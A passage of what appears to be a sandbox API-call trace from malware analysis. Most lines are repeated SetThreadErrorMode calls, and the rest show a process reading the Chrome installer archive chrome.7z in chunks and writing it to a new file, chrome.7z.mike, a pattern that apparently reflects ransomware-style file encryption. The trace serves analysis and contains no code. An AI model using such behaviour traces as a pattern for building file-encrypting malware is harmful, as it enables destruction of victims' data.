lpOldMode=0x2af194) returned 1 [0178.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.463] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0179.280] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.281] GetFileType (hFile=0x1c8) returned 0x1 [0179.282] GetFileType (hFile=0x1c8) returned 0x1 [0179.282] ReadFile (in: hFile=0x1c8, lpBuffer=0x2301130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2301130*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.284] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.285] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.285] GetFileType (hFile=0x1c8) returned 0x1 [0179.285] GetFileType (hFile=0x1c8) returned 0x1 [0179.285] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x467aa20 [0179.286] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.286] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.286] GetFileType (hFile=0x1c8) returned 0x1 [0179.286] GetFileType (hFile=0x1c8) returned 0x1 [0179.287] ReadFile (in: hFile=0x1c8, lpBuffer=0x210de18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x210de18*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.288] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.288] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.288] GetFileType (hFile=0x1c8) returned 0x1 [0179.288] GetFileType (hFile=0x1c8) returned 0x1 [0179.288] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x467d220 [0179.289] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.289] GetFileType (hFile=0x1c8) returned 0x1 [0179.290] GetFileType (hFile=0x1c8) returned 0x1 [0179.290] ReadFile (in: hFile=0x1c8, lpBuffer=0x211ae00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x211ae00*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.292] GetFileType (hFile=0x1c8) returned 0x1 [0179.292] GetFileType (hFile=0x1c8) returned 0x1 [0179.292] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x467fa20 [0179.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.294] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.295] GetFileType (hFile=0x1c8) returned 0x1 [0179.295] GetFileType (hFile=0x1c8) returned 0x1 [0179.295] ReadFile (in: hFile=0x1c8, lpBuffer=0x2127de8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2127de8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.296] GetFileType (hFile=0x1c8) returned 0x1 [0179.297] GetFileType (hFile=0x1c8) returned 0x1 [0179.297] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4682220 [0179.297] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.297] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.298] GetFileType (hFile=0x1c8) returned 0x1 [0179.298] GetFileType (hFile=0x1c8) returned 0x1 [0179.298] ReadFile (in: hFile=0x1c8, lpBuffer=0x2134dd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2134dd0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.299] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.299] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.299] GetFileType (hFile=0x1c8) returned 0x1 [0179.300] GetFileType (hFile=0x1c8) returned 0x1 [0179.300] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4684a20 [0179.300] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.300] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.301] GetFileType (hFile=0x1c8) returned 0x1 [0179.301] GetFileType (hFile=0x1c8) returned 0x1 [0179.301] ReadFile (in: hFile=0x1c8, lpBuffer=0x2141db8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2141db8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.302] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.302] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.303] GetFileType (hFile=0x1c8) returned 0x1 [0179.303] GetFileType (hFile=0x1c8) returned 0x1 [0179.303] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4687220 [0179.303] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.304] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.304] GetFileType (hFile=0x1c8) returned 0x1 [0179.304] GetFileType (hFile=0x1c8) returned 0x1 [0179.304] ReadFile (in: hFile=0x1c8, lpBuffer=0x214eda0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x214eda0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.305] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: 